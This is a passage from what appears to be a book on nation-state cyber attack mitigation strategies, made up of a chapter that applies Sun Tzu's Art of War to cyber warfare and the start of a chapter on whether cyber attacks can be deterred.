
What is Cyber Warfare?

The Internet, in a technical sense, is merely a large collection of networked computers. Humans, however, have grown dependent on "cyberspace" – the flow of information and ideas that they receive from the Internet on a continual basis and immediately incorporate into their lives. As our dependence upon the Internet grows, what hackers think of as their potential "attack surface" expands. The governance of national security and international conflict is no different: political and military adversaries now routinely use and abuse computers in support of strategic and tactical objectives. In the early 1980s, Soviet thinkers referred to this as the Military Technological Revolution (MTR); following the 1991 Gulf War, the Pentagon's Revolution in Military Affairs (RMA) was practically a household term.319

Cyber attacks first and foremost exploit the power and reach of the Internet.
For example, since the earliest days of the Web, Chechen rebels have demonstrated the power of Internet-enabled propaganda.320 Second, cyber attacks exploit the Inter- net’s vulnerability. In 2007, Syrian air defense was reportedly disabled by a cyber attack moments before the Israeli Air Force demolished an alleged Syrian nuclear re- actor.321 Third, cyber attackers benefit from a degree of anonymity. During the 1999 war over Kosovo, unknown hackers tried to disrupt NATO military operations and were able to claim minor victories.322 Fourth, even a nation-state can be targeted. In 2009, the whole of Kyrgyzstan was knocked offline during a time of domestic politi- 319 Mishra, 2003. 320 Goble, 1999. 321 Fulghum et al, 2007. 322 Geers, 2008. 96 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES cal crisis.323 This list could be lengthened to include cyber warfare’s high return on investment, an attacker’s plausible deniability, the immaturity of cyber defense as a discipline, the increased importance of non-state actors in the Internet era, and more. Cyber attacks are best understood as an extraordinary means to a wide variety of ends: espionage, financial damage, and even the manipulation of national critical infrastructures. They can influence the course of conflict between governments, between citizens, and between government and civil society. What is Art of War? Modern military doctrine draws from a deep well of philosophy that spans political, economic, and scientific revolutions. The oldest and most profound treatise is Sun Tzu’s Military Strategy, known as Art of War (孫子兵法). Much of our current un- derstanding of military concepts such as grand strategy, center of gravity, decisive point, and commander’s intent can be traced to this book.324 According to Chinese tradition, Art of War was written by Sun Wu (now Tzu) in the 6th century B.C. and is one of China’s Seven Military Classics. Some scholars argue that gaps in logic and anachronisms in the text point to multiple authors, and they further contend that Art of War is a compilation of different texts that were brought together over time. Nonetheless, the book has an internal consistency that implies it is the product of one school of military thought. Art of War was translated for the West by a French missionary in 1782 and may have had an influence on the battle- field victories of Napoleon, who was likely familiar with its contents.325 Art of War has survived for 2,500 years because its advice is not only compelling, but concise, easy to understand, and flexible. Sun Tzu does not give military leaders a concrete plan of action, but a series of recommendations that can be adapted to new circumstances. Sun Tzu’s concepts have been successfully applied to disciplines other than warfare, including sports, social relationships, and business.326 There are thirteen chapters in Art of War, each dedicated to a particular facet of warfare. This chapter highlights at least one topical passage from each chapter and will argue that Sun Tzu provides a workable but not a perfect framework for the management of cyber war. 323 Keizer, 2009. 324 Van Riper, 2006. 325 Ralph D. Sawyer, Sun Tzu: Art of War (Oxford: Westview Press, 1994) 79, 127. 326 Ibid, 15. 97 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? Strategic Thinking Art of War opens with a warning: The Art of War is of vital importance to the State. It is a matter of life and death, a road either to safety or to ruin. 
Hence it is a subject of inquiry which can on no account be neglected. AoW: I. Laying Plans327 At the strategic level, a leader must take the steps necessary to prevent political coercion by a foreign power and to prevent a surprise military attack.328 Regard- ing offensive military operations, Art of War states that they are justified only in response to a direct threat to the nation; economic considerations, for example, are insufficient.329 Cyberspace is such a new arena of conflict that basic defense and attack strategies are still unclear. There have been no major wars (yet) between modern, cyber-capa- ble adversaries. Further, cyber warfare tactics are highly technical by nature, often accessible only to subject matter experts. As with terrorism, hackers have found success in pure media hype. As with Weapons of Mass Destruction (WMD), it is challenging to retaliate against an asymmetric threat. Attack attribution is the most vexing question of all – if the attacker can remain anonymous, defense strategies ap- pear doomed from the start. Finally, the sensitive nature of cyber warfare capabili- ties and methods has inhibited international discussion on the subject and greatly increased the amount of guesswork required by national security planners. The grace period for uncertainty may be running out. Modern militaries, like the governments and economies they protect, are increasingly reliant on IT infrastruc- ture. In 2010, the United States Air Force procured more unmanned than manned aircraft for the first time.330 IT investment on this scale necessarily means an in- creased mission dependence on IT. As adversaries look for their opponent’s Achilles heel, IT systems will be attractive targets. It is likely that the ground fighting of fu- ture wars will be accompanied by a parallel, mostly invisible battle of wits between state-sponsored hackers over the IT infrastructure that is required to wage war at all. Celebrated Red Team exercises, such as the U.S. Department of Defense’s Eligible Receiver in 1997, suggest that cyber attacks are potentially powerful weapons. Dur- 327 All Sun Tzu quotes are from Sun Tzu, Art of War (Project Gutenberg eBook, 1994, translated by Lionel Giles, 1910). 328 Sawyer, 1994. 329 Ibid. 330 Orton, 2009. 98 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES ing the exercise, simulated North Korean hackers, using a variety of hacker and information warfare tactics including the transmission of fabricated military orders and news reports, “managed to infect the human command-and-control system with a paralyzing level of mistrust .... As a result, nobody in the chain of command, from the president on down, could believe anything.”331 Because cyber warfare is unconventional and asymmetric warfare, nations weak in conventional military power are likely to invest in it as a way to offset conventional disadvantages. Good hacker software is easier to obtain than a tank or a rifle. Intel- ligence officials such as former CIA Director James Woolsey warn that even terrorist groups will possess cyber weapons of strategic significance in the next few years.332 Some analysts argue persuasively that the threat from cyber warfare is overstat- ed.333 However, national security planners cannot afford to underestimate its po- tential. A general rule could be that, as dependence on IT and the Internet grows, governments should make proportional investments in network security, incident response, technical training, and international collaboration. 
In the near term, international security dialogue must update familiar vocabulary, such as attack, defense, deterrence and escalation, to encompass post-IT Revolu- tion realities. The process that began nearly thirty years ago with MTR and RMA continues with the NATO Network Enabled Capability (NNEC), China’s Unrestricted Warfare, and the creation of U.S. Cyber Command. However, the word cyber still does not appear in NATO’s current Strategic Concept (1999), so there remains much work to be done. A major challenge with IT technology is that it changes so quickly it is difficult to follow – let alone master – all of the latest developments. From a historical perspective, it is tempting to think cyber warfare could have a positive impact on human conflict. For example, Sun Tzu advised military command- ers to avoid unnecessary destruction of adversary infrastructure. In the practical Art of War, the best thing of all is to take the enemy’s country whole and intact; to shatter and destroy it is not so good. So, too, it is better to recapture an army entire than to destroy it, to capture a regiment, a detachment or a company entire than to destroy them. AoW: III. Attack by Stratagem If cyber attacks play a lead role in future wars, and the nature of the fight is largely over IT infrastructure, it is conceivable that international conflicts will be shorter 331 Adams, 2001. 332 Aitoro, 2009. 333 Two are Cambridge University Professor Ross Anderson and Wired Threat Level Editor Kevin Poulsen. 99 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? and cost fewer lives. A cyber-only victory could facilitate economic recovery and post-war diplomacy. Such an achievement would please Sun Tzu, who argued that the best leaders can attain victory before combat is even necessary.334 Hence to fight and conquer in all your battles is not supreme excellence; supreme excellence consists in breaking the enemy’s resistance without fighting. AoW: III. At- tack by Stratagem But there is no guarantee that the increased use of cyber warfare will lead to less human suffering during international conflicts. If national critical infrastructures, such as water or electricity, are damaged for any period of time, what caused the outage will make little difference to those affected. Military leaders are specifically worried that cyber attacks could have unforeseen “cascading” effects that would inadvertently lead to civilian casualties, violate the Geneva Convention and bring war crimes charges.335 The anonymous nature of cyber attacks also leads to the dis- turbing possibility of unknown and therefore undeterred hackers targeting critical infrastructures during a time of peace for purely terrorist purposes. Cultivating Success Due to the remarkable achievements of cyber crime and cyber espionage,336 as well as plenty of media hype, cyber warfare will be viewed by military commanders as both a threat and an opportunity. But the most eloquent passages from Art of War relate to building a solid defense, and this is where a cyber commander must begin. The Art of War teaches us to rely not on the likelihood of the enemy’s not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable. AoW: VIII. 
Variation in Tactics Sun Tzu advises commanders not to rely on the good intentions of others or to count on best-case scenarios.337 In cyberspace, this is sound advice; computers are attacked from the moment they connect to the Internet.338 Cyber attackers currently have numerous advantages over defenders, including worldwide connectivity, vul- 334 Sawyer, 1994. 335 Graham, 1999. 336 “Espionage Report...” 2007; Cody, 2007. 337 Sawyer, 1994. 338 Skoudis, 2006. 100 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES nerable network infrastructure, poor attacker attribution, and the ability to choose their time and place of attack. Defenders are not without resources. They own what should be the most power- ful asset in the battle – home-field advantage, and they must begin to use it more wisely. Defenders have indigenous “super-user” rights throughout the network, and they can change hardware and software configurations at will. They can build re- dundancy into their operations and implement out-of-band cross-checking of impor- tant information. Such tactics are essential because cyber attack methods evolve so quickly that static, predictable defenses are doomed to fail. A primary goal should be to create a unique environment that an attacker has never seen before. This will require imagination, creativity, and the use of deception. Hence that general is skillful in attack whose opponent does not know what to defend; and he is skillful in defense whose opponent does not know what to attack. AoW: VI. Weak Points and Strong Adversary cyber reconnaissance should be made as difficult as possible. Adversar- ies must have to work hard for their intelligence, and they should doubt that the information they were able to steal is accurate. Attackers should be forced to lose time, wander into digital traps, and betray information regarding their identity and intentions. Thus one who is skillful at keeping the enemy on the move maintains deceitful ap- pearances, according to which the enemy will act. He sacrifices something that the enemy may snatch at it. By holding out baits, he keeps him on the march; then with a body of picked men he lies in wait for him. AoW: V. Energy As in athletics, cyber warfare tactics are often related to leverage. In an effort to gain the upper hand, both attackers and defenders attempt to dive deeper than their opponent into files, applications, operating systems, compilers, and hardware. Strategic attacks even target future technologies at their source – the research and development networks of software companies or personnel working in the defense industry. The general who is skilled in defense hides in the most secret recesses of the earth... AoW: IV. Tactical Dispositions In fact, professional hacker tools and tactics are stealthy enough that a wise system administrator should presume some level of system breach at all times. Defenses should be designed on the assumption that there is always a digital spy somewhere in the camp. 101 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? One of the first challenges in cyber warfare is simply to know if you are under at- tack. Therefore, a good short-term cyber defense goal is to improve an organization’s ability to collect, evaluate, and transmit digital evidence. If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. 
If you know neither the enemy nor yourself, you will succumb in every battle. AoW: III. Attack by Stratagem In the late 1990s, Moonlight Maze, the “largest cyber-intelligence investigation ever,” uncovered wide-ranging attacks targeting U.S. technical research, government contracts, encryption techniques, and war-planning data. Despite years of effort, law enforcement was able to find “disturbingly few clues” to help determine attribu- tion.339 And because cyber warfare is a new phenomenon that changes so quickly, it is difficult even for law enforcement officers to be sure they are operating within the constraints of the law. A long-term national objective should be the creation of a Distant Early Warning Line for cyber war. National security threats, such as propaganda, espionage, and attacks on critical infrastructure, have not changed, but they are now Internet-en- abled. Adversaries have a new delivery mechanism that can increase the speed, diffusion, and even the power of an attack. Thus, what enables the wise sovereign and the good general to strike and conquer, and achieve things beyond the reach of ordinary men, is foreknowledge. AoW: XIII. The Use of Spies Because IT security is a highly technical discipline, a broader organizational support structure must be built around it. To understand the capabilities and intentions of potential adversaries, such an effort must incorporate the analysis of both cyber and non-cyber data points. Geopolitical knowledge is critical. Whenever international tension is high, cyber defenders must now take their posts. In today’s Middle East, it is safe to assume that cyber attacks will always accompany the conflict on the ground. For example, in 2006 as fighting broke out between Israel and Gaza, pro- Palestinian hackers denied service to around 700 Israeli Internet domains.340 Information collection and evaluation were so important to Sun Tzu that the entire final chapter of Art of War is devoted to espionage. Spies are called the “sovereign’s 339 Adams, 2001: Russian telephone numbers were eventually associated with the hacks, but the U.S. was unable to gain further attribution. 340 Stoil & Goldstein, 2006. 102 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES most precious faculty” and espionage a “divine manipulation of the threads.” The cost of spying, when compared to combat operations, is said to be so low that it is the “height of inhumanity” to ignore it. Such a commander is “no leader of men, no present help to his sovereign, no master of victory.”341 In the wars of the future, brains will beat brawn with increasing frequency. Fol- lowing the IT Revolution, the need for investment in human capital has risen dra- matically. However, cyber defense is still an immature discipline, and it is difficult to retain personnel with highly marketable training. To gain a long-term competitive advantage, a nation must invest in science and technology as a national priority.342 Objective Calculations Sun Tzu warns that a commander must exhaustively and dispassionately analyze all available information. Offensive operations in particular should wait until a decisive victory is expected. If objective calculations yield an unfavorable result, the inferior party must assume a defensive posture until circumstances have changed in its favor.343 Now the general who wins a battle makes many calculations in his temple ere the battle is fought. The general who loses a battle makes but few calculations before- hand. 
Thus do many calculations lead to victory, and few calculations to defeat: how much more no calculation at all! It is by attention to this point that I can foresee who is likely to win or lose. AoW: I. Laying Plans

In any conflict, there are prevailing environmental and situational factors over which the combatants have little control. Art of War lists over three dozen such factors to evaluate, including offense/defense, orthodox/unorthodox, rested/exhausted, dry/wet, and confident/afraid.344 Most of these will have direct or indirect parallels in cyberspace.

In cyberspace, reliable calculations are extremely difficult to perform. First and foremost, cyber attackers possess enough advantages over defenders that there is an enormous gap in Return-on-Investment (RoI) between them. The cost of conducting a cyber attack is cheap, and there is little penalty for failure. Network reconnaissance can be conducted, without fear of retaliation, until a suitable vulnerability is found. Once an adversary system is compromised and exploited, there are often immediate rewards. By comparison, cyber defense is expensive and challenging, and there is no tangible RoI.

341 Sun Tzu, Art of War: "XIII. The Use of Spies." 342 Rarick, 1996. 343 Sawyer, 1994. 344 Ibid.

Another aspect of cyberspace that makes calculation difficult is its constantly changing nature. The Internet is a purely artificial construct that is modified continually from across the globe. Cyber reconnaissance and intelligence collection are of reliable value to a military commander only for a short period of time. The geography of cyberspace changes without warning, and software updates and network reconfiguration create an environment where insurmountable obstacles and golden opportunities can appear and disappear as if by magic. The terrestrial equivalent could only be a catastrophic event such as an earthquake or an unexpected snowstorm.

Art of War describes six types of battlefield terrain, ranging from "accessible," which can be freely traversed by both sides, to "narrow passes," which must either be strongly garrisoned or avoided altogether (unless the adversary has failed to fortify them).345 Although they will change over time, cyber equivalents for each Art of War terrain type are easily found in Internet, intranet, firewall, etc.

The natural formation of the country is the soldier's best ally; but a power of estimating the adversary, of controlling the forces of victory, and of shrewdly calculating difficulties, dangers and distances, constitutes the test of a great general. AoW: X. Terrain

Cyberspace possesses characteristics that the Art of War framework does not encompass. For example, in cyberspace the terrestrial distance between adversaries can be completely irrelevant. If "connectivity" exists between two computers, attacks can be launched at any time from anywhere in the world, and they can strike their targets instantly. There is no easily defined "front line;" civilian and military zones on the Internet often share the same space, and military networks typically rely on civilian infrastructure to operate. With such amazing access to an adversary, never before in history has superior logic – not physical size or strength – more often determined the victor in conflict.

Similar to cyber geography, cyber weapons also have unreliable characteristics. Some attacks that hackers expect to succeed fail, and vice versa.
Exploits may work on one, but not another, apparently similar target. Exploits that work in one instance may never work again. Thus, it can be impossible to know if a planned cyber attack will succeed until the moment it is launched. Cyber weapons should be considered single-use weapons because defenders can reverse-engineer them to defend their 345 Sun Tzu, Art of War: “X. Terrain.” 104 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES networks or try to use them for their own offensive purposes. These limitations make meticulous pre-operational cyber attack planning and timing critical.346347 Last but not least, one of the major challenges confronting any military commander is to keep track of the location and constitution of adversary forces. However, cyber defenses such as passive network monitoring devices can be nearly impossible to find. If in the neighborhood of your camp there should be any hilly country, ponds sur- rounded by aquatic grass, hollow basins filled with reeds, or woods with thick under- growth, they must be carefully routed out and searched; for these are places where men in ambush or insidious spies are likely to be lurking. AoW: IX. The Army on the March Cyber commanders are wise to assume, especially if they are conducting an of- fensive operation on adversary terrain, that the defenses and traps they can see are more powerful than they appear, and that there are some defenses in place that they will never find. Adversary sensors could even lie on the open Internet, such as on a commercial Internet Service Provider (ISP), outside of the cyber terrain that the adversary immediately controls. Time to Fight Once the decision to go to war has been made (or forced), Sun Tzu offers plenty of battlefield advice to a military commander. Art of War operations emphasize speed, surprise, economy of force, and asymmetry. These characteristics happen to be syn- onymous with cyber warfare. Rapidity is the essence of war: take advantage of the enemy’s unreadiness, make your way by unexpected routes, and attack unguarded spots. AoW: XI. The Nine Situations If you set a fully equipped army in march in order to snatch an advantage, the chanc- es are that you will be too late. On the other hand, to detach a flying column for the purpose involves the sacrifice of its baggage and stores. AoW: VII. Maneuvering The potential role of computer network operations in military conflict has been compared to strategic bombing, submarine warfare, special operations forces, and 346 Parks & Duggan, 2001. 347 Lewis, 2002. 105 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? assassins.348 The goal of such unorthodox, asymmetric attacks is to inflict painful damage on an adversary from a safe distance or from close quarters with the ele- ment of surprise. By discovering the enemy’s dispositions and remaining invisible ourselves, we can keep our forces concentrated, while the enemy’s must be divided.... Hence there will be a whole pitted against separate parts of a whole, which means that we shall be many to the enemy’s few. AoW: VI. Weak Points and Strong In theory, a cyber attack can accomplish the same objectives as a special forces raid, with the added benefit of no human casualties on either side. If cyber attacks were to achieve that level of success, they could come to redefine elegance in warfare. A cyber attack is best understood not as an end in itself, but as an extraordinary means to accomplish almost any objective. 
Cyber propaganda can reach the entire world in seconds via online news media. Cyber espionage can be used to steal even nuclear weapons technology.349 Moreover, a successful cyber attack on an electrical grid could bring down myriad other infrastructures that have no other source of power.350 In fact, in 2008 and 2009, hackers were able to force entire nation-states offline.351 Attacking a nation’s critical infrastructure is an old idea. Militaries seek to win not just individual battles, but wars. Toward that end, they must reduce an adversary’s long-term ability to fight. And the employment of a universal tool to attack an ad- versary in creative ways is not new. Witness Sun Tzu’s advice from Art of War on the use of fire: There are five ways of attacking with fire. The first is to burn soldiers in their camp; the second is to burn stores; the third is to burn baggage trains; the fourth is to burn arsenals and magazines; the fifth is to hurl dropping fire amongst the enemy. AoW: XII. The Attack by Fire Sun Tzu did not know that baggage trains would one day need functioning comput- ers and uncompromised computer code to deliver their supplies on time. Specific tactical advice from Art of War provides a clear example. As in the Syrian air defense attack cited above, Sun Tzu instructs military commanders to accomplish 348 Parks & Duggan, 2001. 349 Gerth & Risen, 1999. 350 Divis, 2005. 351 Keizer, 2008; Keizer, 2009. 106 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES something for which digital denial-of-service (DoS) appears ideal – to sever commu- nications between adversary military forces. Those who were called skillful leaders of old knew how to drive a wedge between the enemy’s front and rear; to prevent co-operation between his large and small divisions; to hinder the good troops from rescuing the bad, the officers from rallying their men. AoW: XI. The Nine Situations If modern military forces use the Internet as their primary means of communica- tion, what happens when the Internet is down? Thus it is likely that cyber attacks will play their most critical role when launched in concert with a conventional mili- tary (or terrorist) attack. Sun Tzu warns that surprise attacks may come when a defender’s level of alert is lowest: Now a soldier’s spirit is keenest in the morning; by noonday it has begun to flag; and in the evening, his mind is bent only on returning to camp. A clever general, therefore, avoids an army when its spirit is keen, but attacks it when it is sluggish and inclined to return. This is the art of studying moods. AoW: VII. Maneuvering Cyber criminals already operate according to this rule. They know the work sched- ules of network security personnel and often launch attacks in the evening, on week- ends, or on holidays when cyber defenders are at home. Unfortunately, given the current challenges facing cyber defense, it may be possible simply to tie up com- puter security specialists with diversionary attacks while the critical maneuvers take place elsewhere. If an invasion is successful, Sun Tzu advises military commanders to survive as much as possible on the adversary’s own resources. Hence a wise general makes a point of foraging on the enemy. One cartload of the enemy’s provisions is equivalent to twenty of one’s own, and likewise a single picul of his provender is equivalent to twenty from one’s own store. AoW: II. Waging War In this sense, Art of War and cyber warfare correspond perfectly. 
In computer hack- ing, attackers typically steal the credentials and privileges of an authorized user, af- ter which they effectively become an insider in the adversary’s (virtual) uniform. At that point, inflicting further damage on the network – and thus on the people using that network and their mission – through DoS or espionage is far easier. Such attacks could include poisoned pen correspondence and/or critical data modification. Even 107 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? if the compromise is discovered and contained, adversary leadership may lose its trust in the computer network and cease to use it voluntarily. Finally, cyber warfare is no different from other military disciplines in that the suc- cess of an attack will depend on keeping its mission details a secret. Divine art of subtlety and secrecy! Through you we learn to be invisible, through you inaudible; and hence we can hold the enemy’s fate in our hands. AoW: VI. Weak Points and Strong In military jargon, this is called operational security (OPSEC). However, the charac- teristics that make cyber warfare possible – the ubiquity and interconnected nature of the Internet – ironically make good OPSEC more difficult than ever to achieve. Open source intelligence (OSINT) and computer hacking can benefit cyber defense as much as cyber offense. The Ideal Commander Decision-making in a national security context carries significant responsibilities because lives are often at stake. Thus, on a personal level, Art of War leadership requirements are high. The Commander stands for the virtues of wisdom, sincerity, benevolence, courage and strictness. AoW: I. Laying Plans Good leaders not only exploit flawed plans, but flawed adversaries.352 Discipline and self-control are encouraged; emotion and personal desire are discouraged.353 Sun Tzu states that to avoid a superior adversary is not cowardice, but wisdom.354 More- over, due to the painstaking nature of objective calculations, patience is a virtue. Thus it is that in war the victorious strategist only seeks battle after the victory has been won, whereas he who is destined to defeat first fights and afterwards looks for victory. AoW: IV. Tactical Dispositions Commanding a cyber corps will require a healthy mix of these admirable qualities. As a battleground, cyberspace offers political and military leaders almost limitless possibilities for success – and failure. Behind its façade of global connectivity and influence, the Internet has a complicated and vulnerable architecture that is an ideal 352 Parks & Duggan, 2001. 353 Sun Tzu, Art of War: “VIII. Variation in Tactics.” 354 Sawyer, 1994. 108 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES environment in which to conduct asymmetric and often anonymous military opera- tions. Imagination and creativity are required skill sets. Cyber warfare also involves an enormous amount of uncertainty; even knowing whether one is under attack can be an immense challenge. And the high tempo of Internet operations may lead to a high burn-out rate throughout the ranks. A cyber commander must have a minimum level of subject matter expertise in IT. The core concepts of computing, networking, and data security should be thorough- ly understood before employing them in support of a national security agenda. 
Any leader must be able to articulate the mission so that everyone in the organization understands and believes in it;355 a further challenge in cyber warfare will be communicating with highly technical personalities, who have vastly different personal needs than the soldiers of a traditional military element.

In all future wars, military leadership will have the challenge of coordinating and deconflicting the cyber and non-cyber elements of a battle plan. Sun Tzu gives high praise for a great tactician:

Having collected an army and concentrated his forces, he must blend and harmonize the different elements thereof before pitching his camp. After that, comes tactical maneuvering, than which there is nothing more difficult. The difficulty of tactical maneuvering consists in turning the devious into the direct, and misfortune into gain. AoW: VII. Maneuvering

As circumstances change throughout the course of a conflict, both tactics and strategy must be reevaluated and modified to fit the new environment.356

He who can modify his tactics in relation to his opponent and thereby succeed in winning, may be called a heaven-born captain. AoW: VI. Weak Points and Strong

The dynamic nature of the Internet and the speed of computer network operations guarantee that traditional military challenges such as seizing the initiative and maintaining momentum will require faster decision cycles than a traditional chain-of-command can manage. A cyber commander must have the ability and the trust of his or her superiors to act quickly, creatively, and decisively.

355 Rarick, 1996. 356 Ibid.

Art of Cyber War: Elements of a New Framework

Art of War is the most influential military treatise in human history. The book has survived over 2,500 years in part because its guidance is highly flexible. Strategists and tacticians have adapted Art of War to new circumstances across many scientific revolutions, and Sun Tzu’s insight has never lost much of its resonance.

This chapter argues that in the future cyber warfare practitioners should also use Art of War as an essential guide to military strategy. However, cyberspace possesses many characteristics that are unlike anything Sun Tzu could have imagined in ancient China. There are at least ten distinctive aspects of the cyber battlefield.

1. The Internet is an artificial environment that can be shaped in part according to national security requirements.
2. The rapid proliferation of Internet technologies, including hacker tools and tactics, makes it impossible for any organization to be familiar with all of them.
3. The physical proximity of adversaries loses much of its relevance as cyber attacks are launched without regard to terrestrial geography.
4. Frequent software updates and network reconfiguration change Internet geography unpredictably and without warning.
5. In a reversal of our historical understanding of warfare, the asymmetric nature of cyber attacks strongly favors the attacker.
6. Cyber attacks are more flexible than any weapon the world has seen. They can be used for propaganda, espionage, and the destruction of critical infrastructure.
7. Cyber attacks can be conducted with such a high degree of anonymity that defense strategies such as deterrence and retaliation are not credible.
8. It is possible that a lengthy and costly cyber war could take place without anyone but the direct participants knowing about it.357
9. The intangible nature of cyberspace can make the calculation of victory, defeat, and battle damage a highly subjective undertaking.
10. There are few moral inhibitions to cyber warfare because it relates primarily to the use and exploitation of information in the form of computer code and data packets; so far, there is little perceived human suffering.

357 Libicki, 2009.

None of these characteristics of cyberspace or cyber conflict fits easily into Sun Tzu’s paradigm. As national security thinkers and military strategists begin to write concepts, strategies, and doctrine for cyber warfare with the Art of War model in mind, they should be aware of these differences.

7. DETERRENCE: CAN WE PREVENT CYBER ATTACKS?

National security planners have begun to look beyond reactive, tactical cyber defense to proactive, strategic cyber defense, which may include international military deterrence. The incredible power of nuclear weapons gave birth to deterrence, a military strategy in which the purpose of armies shifted from winning wars to preventing them. Although cyber attacks per se do not compare to a nuclear explosion, they do pose a serious and increasing threat to international security. Real-world examples suggest that cyber warfare will play a lead role in future international conflicts. This chapter examines the two deterrence strategies available to nation-states (denial and punishment) and their three basic requirements (capability, communication, and credibility) in light of cyber warfare. It also explores whether the two most challenging aspects of cyber attacks – attribution and asymmetry – will make cyber attack deterrence an impossible task.

Cyber Attacks and Deterrence Theory

The advent of nuclear weapons disrupted the historical logic of war completely. Deterrence theory emerged after the United States and the Soviet Union created enough military firepower to destroy human civilization on our planet. From that point forward, according to the American military strategist Bernard Brodie,358 the purpose of armies shifted from winning wars to preventing them.

Nothing compares to the destructive power of a nuclear blast. But cyber attacks loom on the horizon as a threat that is best understood as an extraordinary means to a wide variety of political and military ends, many of which can have serious national security ramifications. For example, computer hacking can be used to steal offensive weapons technology (including technology for weapons of mass destruction) or to render an adversary’s defenses inoperable during a conventional military attack.359 In that light, attempting proactively to deter cyber attacks may become an essential part of national military strategies. This chapter examines whether it is possible to apply deterrence theory to cyber attacks.

358 Brodie, 1946. 359 Fulghum et al., 2007.

What military officers call the “battlespace” grows more difficult to define – and to defend – over time. In 1965, Gordon Moore correctly predicted that the number of transistors on a computer chip would double every two years. There has been similar growth in almost all aspects of information technology (IT), including practical encryption, user-friendly hacker tools, and Web-enabled open source intelligence (OSINT).
Even the basic services of a modern society, such as water, electricity and telecommunications, are now computerized and often connected to the Internet.360 Advances in technology are normally evolutionary, but they can be revolutionary – artillery reached over the front lines of battle, and rockets and airplanes crossed national boundaries. Today, cyber attacks can target political leadership, military systems, and average citizens anywhere in the world, during peacetime or war, with the added benefit of attacker anonymity. Political and military strategists now use and abuse computers, databases, and the networks that connect them to achieve their objectives. In the early 1980s, this concept was already known in the Soviet Union as the Military Technological Revolution (MTR); after the 1991 Gulf War, the Pentagon’s Revolution in Military Affairs was almost a household term.361 However, the real-world impact of cyber conflict is still difficult to appreciate, in part because there have been no wars between modern cyber-capable militaries. But an examination of international affairs over the past two decades suggests that cyber battles of increasing consequence are easy to find. Since the earliest days of the World Wide Web, Chechen guerilla fighters, armed not only with rifles but with digital cameras and HTML, have demonstrated the power of Internet-enabled propa- ganda.362 In 2001, tensions between the United States and China spilled over into a non-state, “patriotic” hacker war, with uncertain consequences for national security leadership.363 In 2007, Syrian air defense was reportedly disabled by a cyber attack moments before the Israeli air force demolished an alleged Syrian nuclear reactor.364 In 2009, the entire nation-state of Kyrgyzstan was knocked offline during a time of domestic political crisis,365 and Iranian voters, in “open war” with state security forces, used peer-to-peer social networking websites to avoid government restric- tions on dialogue with the outside world.366 Such a rapid development in the use of cyber tools and tactics suggests that they will play a lead role in future international conflicts. While the Internet has on balance been hugely beneficial to society, law enforce- ment, and counterintelligence, personnel struggle to keep pace with its security 360 Geers, 2009. 361 Mishra, 2003. 362 Goble, 1999. 363 On April 26, 2001, the Federal Bureau of Investigation (FBI) National Infrastructure Protection Cen- ter (NIPC) released Advisory 01-009, “Increased Internet Attacks against U.S. Web Sites and Mail Servers Possible in Early May.” 364 Fulghum et al, 2007. 365 Keizer, 2009. 366 Stöcker et al., 2009. 113 Deterrence: Can We Prevent Cyber Attacks? implications. The ubiquity of the Internet makes cyber warfare a strategic weapon since adversaries can exchange blows at will, regardless of the physical distance be- tween them. By contrast, cyber defense is a tedious process, and cyber attack inves- tigations are typically inconclusive. The astonishing achievements of cyber crime and cyber espionage should hint at the potential damage of a true nation-state-spon- sored cyber attack. Intelligence officials such as former CIA director James Woolsey fear that even terrorist groups will possess cyber weapons of strategic significance in the next few years. 
Military leaders have begun to look beyond reactive, tactical cyber defense367 to the formulation of a proactive, strategic cyber defense policy, which may include international military deterrence.368 However, two challenging aspects of cyber attacks – attribution and asymmetry – will be difficult to overcome.

In theory, nation-states have two primary deterrence strategies – denial and punishment. Both strategies have three basic requirements – capability, communication, and credibility.369 This chapter will examine each concept in turn and explore whether it is possible to deter cyber attacks at the nation-state level.

Cyber Attack Deterrence by Denial

Deterrence by denial is a strategy in which an adversary is physically prevented from acquiring a threatening technology. This is the preferred option in the nuclear sphere because there is no practical defense against a nuclear explosion. Its heat alone is comparable to the interior of the sun, and its blast can demolish reinforced concrete buildings three kilometers away.370 The abhorrent nature of nuclear warfare makes even a theoretical victory difficult to imagine. Deterrence by denial is a philosophy embodied in the Non-Proliferation Treaty (NPT) and one reason behind current international tension with North Korea and Iran.371

367 E.g., how to configure a network or an intrusion detection system. 368 In May 2009, the head of the U.S. Strategic Command, Air Force Gen. Kevin Chilton, stated that retaliation for a cyber attack would not necessarily be limited to cyberspace. 369 These deterrence strategies and requirements I took from a personal interview with Prof. Peter D. Feaver, Alexander F. Hehmeyer Professor of Political Science and Public Policy at Duke University and Director of the Triangle Institute for Security Studies (TISS). 370 Sartori, 1983. 371 Shultz et al., 2007.

Denial: Capability

Despite the diplomatic efforts of NPT, the well-funded inspection regime of the International Atomic Energy Agency (IAEA)372 and unilateral military operations such as Israel’s destruction of nuclear facilities in Iraq in 1981 and in Syria in 2007, the size of the world’s nuclear club is growing. In addition to the five permanent members of the United Nations Security Council,373 de facto members now include India, Israel, Pakistan, and North Korea.374

Cyber attack tools and techniques are not nearly as dangerous as their nuclear counterparts, but they are by comparison simple to acquire, deploy, and hide. Hacker training and conferences are abundant; over the past 17 years, almost 1,000 how-to presentations have been given at DEF CON. More sensitive hacker information can be kept secret, physically transported on a minuscule hard drive, or sent encrypted across the Internet. A nuclear weapons program is difficult to hide;375 a cyber weapons program is not. Cyber attacks can be tested discreetly in a laboratory environment376 or live on the Internet, anonymously. Further, it appears increasingly common to outsource the illegal business of hacking to a commercial or criminal third party.377

A major challenge to cyber attack tool anti-proliferation is how to define malicious code. A legitimate path for remote system administration can also be used by a masquerading hacker to steal national secrets.
